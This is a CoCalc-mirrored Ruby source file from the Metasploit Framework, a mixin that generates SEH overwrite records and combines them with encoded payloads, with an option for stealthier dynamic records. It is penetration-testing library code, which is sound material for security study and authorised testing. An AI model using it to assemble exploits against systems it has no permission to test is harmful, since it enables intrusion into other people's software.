CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/lib/msf/core/exploit/seh.rb
Views: 11784
1
# -*- coding: binary -*-

2
require 'rex/exploitation/seh'

3


4
module Msf

5


6
###

7
#

8
# This mixin provides an interface to generating SEH registration records in a

9
# robust fashion using the Rex::Exploitation::Seh class.

10
#

11
###

12
module Exploit::Seh

13


14
  #

15
  # Creates an instance of an exploit that uses an SEH overwrite.

16
  #

17
  def initialize(info = {})

18
    super

19


20
    # Register an advanced option that allows users to specify whether or

21
    # not a dynamic SEH record should be used.

22
    register_advanced_options(

23
      [

24
        OptBool.new('DynamicSehRecord', [ false, "Generate a dynamic SEH record (more stealthy)", false ])

25
      ], Msf::Exploit::Seh)

26
  end

27


28
  #

29
  # Generates an SEH record with zero or more options.  The supported options

30
  # are:

31
  #

32
  #   NopGenerator

33
  #

34
  #     The NOP generator instance to use, if any.

35
  #

36
  #   Space

37
  #

38
  #     The amount of room the SEH record generator has to play with for

39
  #     random padding.  This should be derived from the maximum amount of

40
  #     space available to the exploit for payloads minus the current payload

41
  #     size.

42
  #

43
  def generate_seh_record(handler, opts = {})

44
    seh = Rex::Exploitation::Seh.new(

45
        payload_badchars,

46
        opts['Space'] || payload_space,

47
        opts['NopGenerator'] || nop_generator)

48


49
    # Generate the record

50
    seh.generate_seh_record(handler, datastore['DynamicSehRecord'])

51
  end

52


53
  def generate_seh_payload(handler, opts = {})

54


55
    # The boilerplate this replaces always has 8 bytes for seh + addr

56
    seh_space = 8 + payload.nop_sled_size

57


58
    seh = Rex::Exploitation::Seh.new(

59
        payload_badchars,

60
        seh_space,

61
        opts['NopGenerator'] || nop_generator)

62


63
    # Generate the record

64
    rec = seh.generate_seh_record(handler, datastore['DynamicSehRecord'])

65


66
    # Append the payload, minus the nop sled that we replaced

67
    rec << payload.encoded.slice(payload.nop_sled_size, payload.encoded.length)

68
  end

69


70
end

71


72
end

73


74